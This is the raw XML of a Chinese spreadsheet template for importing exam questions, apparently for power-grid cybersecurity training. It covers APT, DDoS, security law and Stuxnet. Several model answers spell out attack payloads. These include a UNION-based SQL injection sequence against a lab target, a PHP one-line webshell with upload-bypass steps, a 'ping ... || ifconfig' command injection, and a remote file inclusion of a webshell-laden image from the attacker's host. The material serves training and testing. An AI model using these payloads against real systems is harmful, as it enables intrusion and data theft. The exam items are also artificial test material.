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D:\AWD\20231203-徐总的研发工作\上传数据参考模板\"/>
    </mc:Choice>
  </mc:AlternateContent>
  <xr:revisionPtr revIDLastSave="0" documentId="13_ncr:1_{3CF3BD26-6A7E-4627-972E-000F168B8FEA}" xr6:coauthVersionLast="47" xr6:coauthVersionMax="47" xr10:uidLastSave="{00000000-0000-0000-0000-000000000000}"/>
  <bookViews>
    <workbookView xWindow="-98" yWindow="-98" windowWidth="21795" windowHeight="13695" xr2:uid="{00000000-000D-0000-FFFF-FFFF00000000}"/>
  </bookViews>
  <sheets>
    <sheet name="试题导入模板"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<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="213" uniqueCount="95">
  <si>
    <t>安全</t>
  </si>
  <si>
    <t>全球网络安全威胁和趋势分析</t>
  </si>
  <si>
    <t>网络犯罪掀起新浪潮</t>
  </si>
  <si>
    <t>以下哪个地区（）的APT攻击数量是最多的？</t>
  </si>
  <si>
    <t>单选</t>
  </si>
  <si>
    <t>B</t>
  </si>
  <si>
    <t>（）不是APT概念的攻击战术</t>
  </si>
  <si>
    <t>鱼叉邮件|水坑攻击|社会工程学|拒绝服务</t>
  </si>
  <si>
    <t>D</t>
  </si>
  <si>
    <t>习近平新时代中国特色社会主义思想</t>
  </si>
  <si>
    <t>DDos的常见攻击手段不包括（）？</t>
  </si>
  <si>
    <t>流量带宽消耗|挖断该企业的网络光纤|主机资源消耗|利用拒绝服务漏洞攻击</t>
  </si>
  <si>
    <t>多选</t>
  </si>
  <si>
    <t>ABCD</t>
  </si>
  <si>
    <t>ACD</t>
  </si>
  <si>
    <t>BD</t>
  </si>
  <si>
    <t>ABC</t>
  </si>
  <si>
    <t>AD</t>
  </si>
  <si>
    <t>胡锦涛时期的国家安全观是（）和（）？</t>
  </si>
  <si>
    <t>超越传统安全|国际安全合作|非传统安全|共同安全</t>
  </si>
  <si>
    <t>总体国家安全观的理论价值有（）和（）</t>
  </si>
  <si>
    <t>国家安全理论创新|准确把握国家安全形势新特点新趋势|国家安全各方面内容和要求的有机统一|习近平新时代中国特色社会主义思想重要组成部分</t>
  </si>
  <si>
    <t>网络安全法与下列哪些法律是相关法律且属于同一法律位阶？</t>
  </si>
  <si>
    <t>《保密法》|《反间谍法》|《治安管理处罚法》|《反恐怖主义法》</t>
  </si>
  <si>
    <t>以下哪些函数能够触发反序列化漏洞？</t>
  </si>
  <si>
    <t>__construct|lambda|__destruct|__sleep</t>
  </si>
  <si>
    <t>杀毒软件如何检测恶意程序？</t>
  </si>
  <si>
    <t>特征码检测|流量发送至已检测到的C2服务器|通过沙盒行为提前分析到程序会进行恶意的数据篡改和敏感行为|试图获取键盘记录、屏幕监控等权限</t>
  </si>
  <si>
    <t>以下哪些语言是WEB最常使用的脚本语言？</t>
  </si>
  <si>
    <t>Php|Aspx|Java|Assembly Language</t>
  </si>
  <si>
    <t>威胁呈高发态势</t>
  </si>
  <si>
    <t>网页仿冒手段目前已升级换代</t>
  </si>
  <si>
    <t>判断</t>
  </si>
  <si>
    <t>正确</t>
  </si>
  <si>
    <t>针对HTTPS和SSL证书网站的攻击越来越多</t>
  </si>
  <si>
    <t>错误</t>
  </si>
  <si>
    <t>大力提升全民安全意识</t>
  </si>
  <si>
    <t>构建国家安全战略，需要内外皆修，标本兼治，统筹好内因和外因，兼顾好重点与一般，加强维护好国家安全能力建设。其中最为关键的是顶层设计能力，协调好个人与安全的关系。</t>
  </si>
  <si>
    <t>题目图片</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>出题描述</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>学科</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>题库名称</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>出题人</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t xml:space="preserve">参考答案	</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t xml:space="preserve">试题类型	</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t xml:space="preserve">试题名称	</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t xml:space="preserve">试题问题	</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t xml:space="preserve">难易程度	</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>简答</t>
  </si>
  <si>
    <t>论述</t>
  </si>
  <si>
    <t>简单</t>
  </si>
  <si>
    <t>困难</t>
  </si>
  <si>
    <t>中等</t>
  </si>
  <si>
    <t>简述2010年震网病毒如何投递到伊朗核电站，并如何进行攻击致使离心机报废？</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>简述震网病毒感染到主机的行为特征？以及震网病毒的特点及启示？</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>描述基于联合查询注入的SQL注入过程，给出每步详细的payload和思路简述。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1.如何投递到伊朗核电站
病毒本身具备传播和潜伏能力，会在win server系列检测是否有西门子系统来决定病毒是否被激活，否则只是静态潜伏和传播。传播方式是用过U盘传播，会利用打印机漏洞、U盘自动播放功能，进行摆渡传输。最终通过这种途径，进入伊朗的核电站系统。
2.如何攻击，报废离心机。
病毒会劫持控制机发送向监控系统的流量，发送伪造的正常的流量向监控系统，使得监控人员感知不到离心机运转异常；发送超负荷指令给离心机，使得离心机在特定时间超速运转，降低寿命。最终离心机报废。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1.特征
潜伏：仅在server环境探活，其他被感染环境仅潜伏和传播，没有暴露的行为
传播方式：利用U盘摆渡传播
漏洞利用方式大：利用多个零日漏洞和N day漏洞
智慧：劫持离心机发送虚假监控数据
2.特点
针对性：检测server、西门子等工控环境场景才激活程序行为
代价高昂：使用多个0 day漏洞
定向性：针对专门工控场景系统
3.启示
云查杀的普及用以防止此类病毒程序的巨大扩散，避免某程序扩散后但是没有人意识到其巨大的传播能力</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t xml:space="preserve">1.边界测试
id 设置为 -1 1 100000000，看内容有什么回显
2.判断漏洞点和注⼊类型
判断数字型 id=1 and 1=1
1 and 1=2 时间盲注 1 and sleep(5);--+
字符型 1' and '1'='1 1' and '1'='2 时间盲注 1' and sleep(5)--+
3.查列名
order by
4.联合查询
union select (列数填充满，)group_concat(table_schema,table_name) from information_schema.tables
查字段名
union select (列数填充满，)group_concat(columu_name) from information_schema.columns
5.直接查得数据
获取库名
/Less-1/?id=-1'+union+select+222,GROUP_CONCAT(DISTINCT+table_schema+SEPARATOR+',+'),4444+AS+concatenated_schemas+FROM+information_schema.columns%3b--+
获取特定库的表名
/Less-1/?id=-1' union select 222,GROUP_CONCAT(DISTINCT table_name SEPARATOR ', '),4444 AS concatenated_schemas FROM information_schema.columns where table_schema='security';-- 
获取特定库的特定表的字段名
-1' union select 222,GROUP_CONCAT(DISTINCT column_name SEPARATOR ', '),4444 AS concatenated_schemas FROM information_schema.columns where table_schema='security' and table_name='users';-- </t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>简述一句话木马的原理以及shell连接工具？并给出文件上传的思路。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>简述命令执行的漏洞原理，给出攻击场景以及执行命令漏洞的思路和payload。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>遇到文件包含场景漏洞题目，如何进行远程文件包含攻击？阐述攻击过程及原因。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>一句话木马本身是个程序，利用eval断言函数远程执行代码。
如 &lt;?php eval($_POST[‘cmd’]);?&gt;
服务端接受post型传参cmd的参数，当作代码字符串运行。在此过程中，我们会使用system(‘ls’)这类系统命令来执行对应的危险操作。
比如上传图片处，我们将后门代码伪装作图片，绕过前端js的限制和后端的文件头、MIME类型检测、图像检查，然后找到上传的后门位置，使用shell工具连接即可。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>是由于服务器执行命令但是过滤不严谨，攻击场景可举例靶场环境中的 ping ip 的问题，网站本身希望留存探活功能，输入ip然后ping，但实际payload 诸如  ping 127.0.0.256 || ifconfig 可以绕过服务器的原本本意的ping命令，执行自己的ifconfig等自己的系统命令。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>文件包含不需要考虑被包含的文件名的后缀，只需要文件中存在正常完整的php代码即可。
构建有后门的1.php（手动传参的一句话后门）和正常的不大的图片1.jpg，使用windows命令 copy 1.jpg /b + 1.php /t muma.jpg，这样可以生成正常图片显示但是包含后门的muma.jpg图片，但是又可以绕过服务器的后端检测。
本地利用phpstudy搭建网站，根目录下放置muma.jpg
寻找目标系统的文件包含点，传参远程包含我们的 http://ip:port/muma.jpg
对此url进行手动传参，执行自己构建的系统命令，如cmd=system(‘ifconfig’);。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>阳泉国网培训网络安全</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>网络安全基础培训</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>2023阳泉国网考试试卷</t>
  </si>
  <si>
    <t>2023阳泉国网考试试卷</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>梆梆安全</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>山东大学</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>清华大学</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>申晏键</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>选择题选项配置</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>西欧|亚洲|美国|东欧</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>网络安全测试</t>
  </si>
  <si>
    <t>SDL</t>
  </si>
  <si>
    <t>主机安全</t>
  </si>
  <si>
    <t>山西移动2021考试题库</t>
  </si>
  <si>
    <t>陈新</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>防恶意代码系统加固时病毒库代码的更新需使用 U 盘和专机查杀等技术手段，避免因跨区拷贝导致外网恶意代码引入到安全区内造成重大安全隐患。</t>
  </si>
  <si>
    <t>数据库中，可以通过TRUNCATE命令实现对表的删除</t>
  </si>
  <si>
    <t>达梦数据库版本有安全版本和普通版本的区别，通过产品的 Lice错se 进行区分</t>
  </si>
  <si>
    <t>国网网考题</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>电力系统考试</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>晋城电力系统考试</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>周芹敏</t>
  </si>
  <si>
    <t>高侃纯</t>
  </si>
  <si>
    <t>牧飙朴</t>
  </si>
  <si>
    <t>卓妤玥</t>
  </si>
  <si>
    <t>劳冶想</t>
  </si>
  <si>
    <t>填空</t>
  </si>
  <si>
    <t>填空测试——试题名称</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>填空测试 -问题1</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>填空测试 -问题2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</si>
</sst>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等线"/>
      <charset val="134"/>
      <scheme val="minor"/>
    </font>
    <font>
      <sz val="9"/>
      <name val="等线"/>
      <family val="3"/>
      <charset val="134"/>
      <scheme val="minor"/>
    </font>
    <font>
      <sz val="11"/>
      <color indexed="8"/>
      <name val="等线"/>
      <family val="3"/>
      <charset val="134"/>
      <scheme val="minor"/>
    </font>
    <font>
      <sz val="11"/>
      <name val="仿宋"/>
      <family val="3"/>
      <charset val="134"/>
    </font>
    <font>
      <sz val="11"/>
      <color theme="1"/>
      <name val="等线"/>
      <family val="3"/>
      <charset val="134"/>
      <scheme val="minor"/>
    </font>
  </fonts>
  <fills count="4">
    <fill>
      <patternFill patternType="none"/>
    </fill>
    <fill>
      <patternFill patternType="gray125"/>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor indexed="9"/>
        <bgColor indexed="64"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor theme="8"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alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="4" fillId="0" borderId="0"/>
    <xf numFmtId="0" fontId="4" fillId="0" borderId="0"/>
    <xf numFmtId="0" fontId="4" fillId="0" borderId="0"/>
    <xf numFmtId="0" fontId="4" fillId="0" borderId="0">
      <alignment vertical="center"/>
    </xf>
  </cellStyleXfs>
  <cellXfs count="8">
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="3"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1" xfId="0" quotePrefix="1"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cellXfs>
  <cellStyles count="5">
    <cellStyle name="常规" xfId="0" builtinId="0"/>
    <cellStyle name="常规 11" xfId="2" xr:uid="{B80AFB8E-7A56-4CE8-832B-7617A26FB012}"/>
    <cellStyle name="常规 2" xfId="4" xr:uid="{81239AC3-3F82-4806-89AA-9A56C1147546}"/>
    <cellStyle name="常规 7" xfId="1" xr:uid="{D5A5B84E-65ED-48CD-BC61-B9032A52B6AC}"/>
    <cellStyle name="常规 7 2 2" xfId="3" xr:uid="{C57BA7E1-42EE-4EA1-A19F-4A8770F7C07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0"/>
  <sheetViews>
    <sheetView tabSelected="1" zoomScale="70" zoomScaleNormal="70" workbookViewId="0">
      <pane ySplit="1" topLeftCell="A2" activePane="bottomLeft" state="frozen"/>
      <selection pane="bottomLeft" activeCell="L20" sqref="A20:L30"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="9" defaultRowHeight="13.9" x14ac:dyDescent="0.4"/>
  <cols>
    <col min="1" max="1" width="12" style="6" customWidth="1"/>
    <col min="2" max="2" width="20.265625" style="6" customWidth="1"/>
    <col min="3" max="3" width="31.73046875" style="7" customWidth="1"/>
    <col min="4" max="5" width="40.06640625" style="6" customWidth="1"/>
    <col min="6" max="6" width="16.59765625" style="6" customWidth="1"/>
    <col min="7" max="7" width="15" style="6" customWidth="1"/>
    <col min="8" max="8" width="32.06640625" style="6" customWidth="1"/>
    <col min="9" max="9" width="20.73046875" style="6" customWidth="1"/>
    <col min="10" max="10" width="32.06640625" style="6" customWidth="1"/>
    <col min="11" max="11" width="20.265625" style="6" customWidth="1"/>
    <col min="12" max="16384" width="9" style="6"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:11" s="5" customFormat="1" x14ac:dyDescent="0.4">
      <c r="A1" s="2" t="s">
        <v>44</v>
      </c>
      <c r="B1" s="2" t="s">
        <v>43</v>
      </c>
      <c r="C1" s="3" t="s">
        <v>45</v>
      </c>
      <c r="D1" s="2" t="s">
        <v>46</v>
      </c>
      <c r="E1" s="2" t="s">
        <v>73</v>
      </c>
      <c r="F1" s="4" t="s">
        <v>38</v>
      </c>
      <c r="G1" s="2" t="s">
        <v>47</v>
      </c>
      <c r="H1" s="2" t="s">
        <v>39</v>
      </c>
      <c r="I1" s="2" t="s">
        <v>40</v>
      </c>
      <c r="J1" s="2" t="s">
        <v>41</v>
      </c>
      <c r="K1" s="2" t="s">
        <v>42</v>
      </c>
    </row>
    <row r="2" spans="1:11" x14ac:dyDescent="0.4">
      <c r="A2" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B2" s="1" t="s">
        <v>5</v>
      </c>
      <c r="C2" s="1" t="s">
        <v>2</v>
      </c>
      <c r="D2" s="1" t="s">
        <v>3</v>
      </c>
      <c r="E2" s="1" t="s">
        <v>74</v>
      </c>
      <c r="F2" s="1"/>
      <c r="G2" s="1" t="s">
        <v>50</v>
      </c>
      <c r="H2" s="1" t="s">
        <v>1</v>
      </c>
      <c r="I2" s="1" t="s">
        <v>0</v>
      </c>
      <c r="J2" s="1" t="s">
        <v>1</v>
      </c>
      <c r="K2" s="1" t="s">
        <v>69</v>
      </c>
    </row>
    <row r="3" spans="1:11" x14ac:dyDescent="0.4">
      <c r="A3" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B3" s="1" t="s">
        <v>8</v>
      </c>
      <c r="C3" s="1" t="s">
        <v>2</v>
      </c>
      <c r="D3" s="1" t="s">
        <v>6</v>
      </c>
      <c r="E3" s="1" t="s">
        <v>7</v>
      </c>
      <c r="F3" s="1"/>
      <c r="G3" s="1" t="s">
        <v>51</v>
      </c>
      <c r="H3" s="1" t="s">
        <v>1</v>
      </c>
      <c r="I3" s="1" t="s">
        <v>0</v>
      </c>
      <c r="J3" s="1" t="s">
        <v>1</v>
      </c>
      <c r="K3" s="1" t="s">
        <v>69</v>
      </c>
    </row>
    <row r="4" spans="1:11" x14ac:dyDescent="0.4">
      <c r="A4" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B4" s="1" t="s">
        <v>5</v>
      </c>
      <c r="C4" s="1" t="s">
        <v>76</v>
      </c>
      <c r="D4" s="1" t="s">
        <v>10</v>
      </c>
      <c r="E4" s="1" t="s">
        <v>11</v>
      </c>
      <c r="F4" s="1"/>
      <c r="G4" s="1" t="s">
        <v>50</v>
      </c>
      <c r="H4" s="1"/>
      <c r="I4" s="1" t="s">
        <v>76</v>
      </c>
      <c r="J4" s="1" t="s">
        <v>78</v>
      </c>
      <c r="K4" s="1" t="s">
        <v>79</v>
      </c>
    </row>
    <row r="5" spans="1:11" x14ac:dyDescent="0.4">
      <c r="A5" s="1" t="s">
        <v>12</v>
      </c>
      <c r="B5" s="1" t="s">
        <v>15</v>
      </c>
      <c r="C5" s="1" t="s">
        <v>75</v>
      </c>
      <c r="D5" s="1" t="s">
        <v>18</v>
      </c>
      <c r="E5" s="1" t="s">
        <v>19</v>
      </c>
      <c r="F5" s="1"/>
      <c r="G5" s="1" t="s">
        <v>50</v>
      </c>
      <c r="H5" s="1"/>
      <c r="I5" s="1" t="s">
        <v>75</v>
      </c>
      <c r="J5" s="1" t="s">
        <v>78</v>
      </c>
      <c r="K5" s="1" t="s">
        <v>79</v>
      </c>
    </row>
    <row r="6" spans="1:11" x14ac:dyDescent="0.4">
      <c r="A6" s="1" t="s">
        <v>12</v>
      </c>
      <c r="B6" s="1" t="s">
        <v>17</v>
      </c>
      <c r="C6" s="1" t="s">
        <v>75</v>
      </c>
      <c r="D6" s="1" t="s">
        <v>20</v>
      </c>
      <c r="E6" s="1" t="s">
        <v>21</v>
      </c>
      <c r="F6" s="1"/>
      <c r="G6" s="1" t="s">
        <v>50</v>
      </c>
      <c r="H6" s="1"/>
      <c r="I6" s="1" t="s">
        <v>75</v>
      </c>
      <c r="J6" s="1" t="s">
        <v>78</v>
      </c>
      <c r="K6" s="1" t="s">
        <v>79</v>
      </c>
    </row>
    <row r="7" spans="1:11" x14ac:dyDescent="0.4">
      <c r="A7" s="1" t="s">
        <v>12</v>
      </c>
      <c r="B7" s="1" t="s">
        <v>13</v>
      </c>
      <c r="C7" s="1" t="s">
        <v>77</v>
      </c>
      <c r="D7" s="1" t="s">
        <v>22</v>
      </c>
      <c r="E7" s="1" t="s">
        <v>23</v>
      </c>
      <c r="F7" s="1"/>
      <c r="G7" s="1" t="s">
        <v>51</v>
      </c>
      <c r="H7" s="1"/>
      <c r="I7" s="1" t="s">
        <v>77</v>
      </c>
      <c r="J7" s="1" t="s">
        <v>78</v>
      </c>
      <c r="K7" s="1" t="s">
        <v>88</v>
      </c>
    </row>
    <row r="8" spans="1:11" x14ac:dyDescent="0.4">
      <c r="A8" s="1" t="s">
        <v>12</v>
      </c>
      <c r="B8" s="1" t="s">
        <v>14</v>
      </c>
      <c r="C8" s="1" t="s">
        <v>77</v>
      </c>
      <c r="D8" s="1" t="s">
        <v>24</v>
      </c>
      <c r="E8" s="1" t="s">
        <v>25</v>
      </c>
      <c r="F8" s="1"/>
      <c r="G8" s="1" t="s">
        <v>50</v>
      </c>
      <c r="H8" s="1"/>
      <c r="I8" s="1" t="s">
        <v>77</v>
      </c>
      <c r="J8" s="1" t="s">
        <v>78</v>
      </c>
      <c r="K8" s="1" t="s">
        <v>88</v>
      </c>
    </row>
    <row r="9" spans="1:11" x14ac:dyDescent="0.4">
      <c r="A9" s="1" t="s">
        <v>12</v>
      </c>
      <c r="B9" s="1" t="s">
        <v>13</v>
      </c>
      <c r="C9" s="1" t="s">
        <v>77</v>
      </c>
      <c r="D9" s="1" t="s">
        <v>26</v>
      </c>
      <c r="E9" s="1" t="s">
        <v>27</v>
      </c>
      <c r="F9" s="1"/>
      <c r="G9" s="1" t="s">
        <v>50</v>
      </c>
      <c r="H9" s="1"/>
      <c r="I9" s="1" t="s">
        <v>77</v>
      </c>
      <c r="J9" s="1" t="s">
        <v>78</v>
      </c>
      <c r="K9" s="1" t="s">
        <v>89</v>
      </c>
    </row>
    <row r="10" spans="1:11" x14ac:dyDescent="0.4">
      <c r="A10" s="1" t="s">
        <v>12</v>
      </c>
      <c r="B10" s="1" t="s">
        <v>16</v>
      </c>
      <c r="C10" s="1" t="s">
        <v>77</v>
      </c>
      <c r="D10" s="1" t="s">
        <v>28</v>
      </c>
      <c r="E10" s="1" t="s">
        <v>29</v>
      </c>
      <c r="F10" s="1"/>
      <c r="G10" s="1" t="s">
        <v>50</v>
      </c>
      <c r="H10" s="1"/>
      <c r="I10" s="1" t="s">
        <v>77</v>
      </c>
      <c r="J10" s="1" t="s">
        <v>78</v>
      </c>
      <c r="K10" s="1" t="s">
        <v>90</v>
      </c>
    </row>
    <row r="11" spans="1:11" x14ac:dyDescent="0.4">
      <c r="A11" s="1" t="s">
        <v>48</v>
      </c>
      <c r="B11" s="1" t="s">
        <v>56</v>
      </c>
      <c r="C11" s="1" t="s">
        <v>65</v>
      </c>
      <c r="D11" s="1" t="s">
        <v>53</v>
      </c>
      <c r="E11" s="1"/>
      <c r="F11" s="1"/>
      <c r="G11" s="1" t="s">
        <v>52</v>
      </c>
      <c r="H11" s="1" t="s">
        <v>66</v>
      </c>
      <c r="I11" s="1" t="s">
        <v>0</v>
      </c>
      <c r="J11" s="1" t="s">
        <v>68</v>
      </c>
      <c r="K11" s="1" t="s">
        <v>72</v>
      </c>
    </row>
    <row r="12" spans="1:11" x14ac:dyDescent="0.4">
      <c r="A12" s="1" t="s">
        <v>48</v>
      </c>
      <c r="B12" s="1" t="s">
        <v>57</v>
      </c>
      <c r="C12" s="1" t="s">
        <v>65</v>
      </c>
      <c r="D12" s="1" t="s">
        <v>54</v>
      </c>
      <c r="E12" s="1"/>
      <c r="F12" s="1"/>
      <c r="G12" s="1" t="s">
        <v>52</v>
      </c>
      <c r="H12" s="1" t="s">
        <v>66</v>
      </c>
      <c r="I12" s="1" t="s">
        <v>0</v>
      </c>
      <c r="J12" s="1" t="s">
        <v>68</v>
      </c>
      <c r="K12" s="1" t="s">
        <v>72</v>
      </c>
    </row>
    <row r="13" spans="1:11" x14ac:dyDescent="0.4">
      <c r="A13" s="1" t="s">
        <v>48</v>
      </c>
      <c r="B13" s="1" t="s">
        <v>62</v>
      </c>
      <c r="C13" s="1" t="s">
        <v>65</v>
      </c>
      <c r="D13" s="1" t="s">
        <v>59</v>
      </c>
      <c r="E13" s="1"/>
      <c r="F13" s="1"/>
      <c r="G13" s="1" t="s">
        <v>52</v>
      </c>
      <c r="H13" s="1" t="s">
        <v>66</v>
      </c>
      <c r="I13" s="1" t="s">
        <v>0</v>
      </c>
      <c r="J13" s="1" t="s">
        <v>67</v>
      </c>
      <c r="K13" s="1" t="s">
        <v>72</v>
      </c>
    </row>
    <row r="14" spans="1:11" x14ac:dyDescent="0.4">
      <c r="A14" s="1" t="s">
        <v>48</v>
      </c>
      <c r="B14" s="1" t="s">
        <v>63</v>
      </c>
      <c r="C14" s="1" t="s">
        <v>65</v>
      </c>
      <c r="D14" s="1" t="s">
        <v>60</v>
      </c>
      <c r="E14" s="1"/>
      <c r="F14" s="1"/>
      <c r="G14" s="1" t="s">
        <v>52</v>
      </c>
      <c r="H14" s="1" t="s">
        <v>66</v>
      </c>
      <c r="I14" s="1" t="s">
        <v>0</v>
      </c>
      <c r="J14" s="1" t="s">
        <v>67</v>
      </c>
      <c r="K14" s="1" t="s">
        <v>72</v>
      </c>
    </row>
    <row r="15" spans="1:11" x14ac:dyDescent="0.4">
      <c r="A15" s="1" t="s">
        <v>49</v>
      </c>
      <c r="B15" s="1" t="s">
        <v>58</v>
      </c>
      <c r="C15" s="1" t="s">
        <v>65</v>
      </c>
      <c r="D15" s="1" t="s">
        <v>55</v>
      </c>
      <c r="E15" s="1"/>
      <c r="F15" s="1"/>
      <c r="G15" s="1" t="s">
        <v>51</v>
      </c>
      <c r="H15" s="1" t="s">
        <v>66</v>
      </c>
      <c r="I15" s="1" t="s">
        <v>0</v>
      </c>
      <c r="J15" s="1" t="s">
        <v>67</v>
      </c>
      <c r="K15" s="1" t="s">
        <v>72</v>
      </c>
    </row>
    <row r="16" spans="1:11" x14ac:dyDescent="0.4">
      <c r="A16" s="1" t="s">
        <v>49</v>
      </c>
      <c r="B16" s="1" t="s">
        <v>64</v>
      </c>
      <c r="C16" s="1" t="s">
        <v>65</v>
      </c>
      <c r="D16" s="1" t="s">
        <v>61</v>
      </c>
      <c r="E16" s="1"/>
      <c r="F16" s="1"/>
      <c r="G16" s="1" t="s">
        <v>51</v>
      </c>
      <c r="H16" s="1" t="s">
        <v>66</v>
      </c>
      <c r="I16" s="1" t="s">
        <v>0</v>
      </c>
      <c r="J16" s="1" t="s">
        <v>67</v>
      </c>
      <c r="K16" s="1" t="s">
        <v>72</v>
      </c>
    </row>
    <row r="17" spans="1:12" x14ac:dyDescent="0.4">
      <c r="A17" s="1" t="s">
        <v>32</v>
      </c>
      <c r="B17" s="1" t="s">
        <v>33</v>
      </c>
      <c r="C17" s="1" t="s">
        <v>30</v>
      </c>
      <c r="D17" s="1" t="s">
        <v>31</v>
      </c>
      <c r="E17" s="1"/>
      <c r="F17" s="1"/>
      <c r="G17" s="1" t="s">
        <v>52</v>
      </c>
      <c r="H17" s="1" t="s">
        <v>1</v>
      </c>
      <c r="I17" s="1" t="s">
        <v>0</v>
      </c>
      <c r="J17" s="1" t="s">
        <v>1</v>
      </c>
      <c r="K17" s="1" t="s">
        <v>70</v>
      </c>
    </row>
    <row r="18" spans="1:12" x14ac:dyDescent="0.4">
      <c r="A18" s="1" t="s">
        <v>32</v>
      </c>
      <c r="B18" s="1" t="s">
        <v>33</v>
      </c>
      <c r="C18" s="1" t="s">
        <v>30</v>
      </c>
      <c r="D18" s="1" t="s">
        <v>34</v>
      </c>
      <c r="E18" s="1"/>
      <c r="F18" s="1"/>
      <c r="G18" s="1" t="s">
        <v>52</v>
      </c>
      <c r="H18" s="1" t="s">
        <v>1</v>
      </c>
      <c r="I18" s="1" t="s">
        <v>0</v>
      </c>
      <c r="J18" s="1" t="s">
        <v>1</v>
      </c>
      <c r="K18" s="1" t="s">
        <v>70</v>
      </c>
    </row>
    <row r="19" spans="1:12" x14ac:dyDescent="0.4">
      <c r="A19" s="1" t="s">
        <v>32</v>
      </c>
      <c r="B19" s="1" t="s">
        <v>33</v>
      </c>
      <c r="C19" s="1" t="s">
        <v>36</v>
      </c>
      <c r="D19" s="1" t="s">
        <v>37</v>
      </c>
      <c r="E19" s="1"/>
      <c r="F19" s="1"/>
      <c r="G19" s="1" t="s">
        <v>52</v>
      </c>
      <c r="H19" s="1" t="s">
        <v>9</v>
      </c>
      <c r="I19" s="1" t="s">
        <v>0</v>
      </c>
      <c r="J19" s="1" t="s">
        <v>9</v>
      </c>
      <c r="K19" s="1" t="s">
        <v>71</v>
      </c>
    </row>
    <row r="20" spans="1:12" x14ac:dyDescent="0.4">
      <c r="A20" s="1" t="s">
        <v>32</v>
      </c>
      <c r="B20" s="1" t="s">
        <v>33</v>
      </c>
      <c r="C20" s="1" t="s">
        <v>83</v>
      </c>
      <c r="D20" s="1" t="s">
        <v>80</v>
      </c>
      <c r="E20" s="1"/>
      <c r="F20" s="1"/>
      <c r="G20" s="1" t="s">
        <v>50</v>
      </c>
      <c r="H20" s="1"/>
      <c r="I20" s="1" t="s">
        <v>84</v>
      </c>
      <c r="J20" s="1" t="s">
        <v>85</v>
      </c>
      <c r="K20" s="1" t="s">
        <v>86</v>
      </c>
      <c r="L20" s="1"/>
    </row>
    <row r="21" spans="1:12" x14ac:dyDescent="0.4">
      <c r="A21" s="1" t="s">
        <v>32</v>
      </c>
      <c r="B21" s="1" t="s">
        <v>35</v>
      </c>
      <c r="C21" s="1" t="s">
        <v>83</v>
      </c>
      <c r="D21" s="1" t="s">
        <v>81</v>
      </c>
      <c r="E21" s="1"/>
      <c r="F21" s="1"/>
      <c r="G21" s="1" t="s">
        <v>51</v>
      </c>
      <c r="H21" s="1"/>
      <c r="I21" s="1" t="s">
        <v>84</v>
      </c>
      <c r="J21" s="1" t="s">
        <v>85</v>
      </c>
      <c r="K21" s="1" t="s">
        <v>87</v>
      </c>
      <c r="L21" s="1"/>
    </row>
    <row r="22" spans="1:12" x14ac:dyDescent="0.4">
      <c r="A22" s="1" t="s">
        <v>32</v>
      </c>
      <c r="B22" s="1" t="s">
        <v>33</v>
      </c>
      <c r="C22" s="1" t="s">
        <v>83</v>
      </c>
      <c r="D22" s="1" t="s">
        <v>82</v>
      </c>
      <c r="E22" s="1"/>
      <c r="F22" s="1"/>
      <c r="G22" s="1" t="s">
        <v>50</v>
      </c>
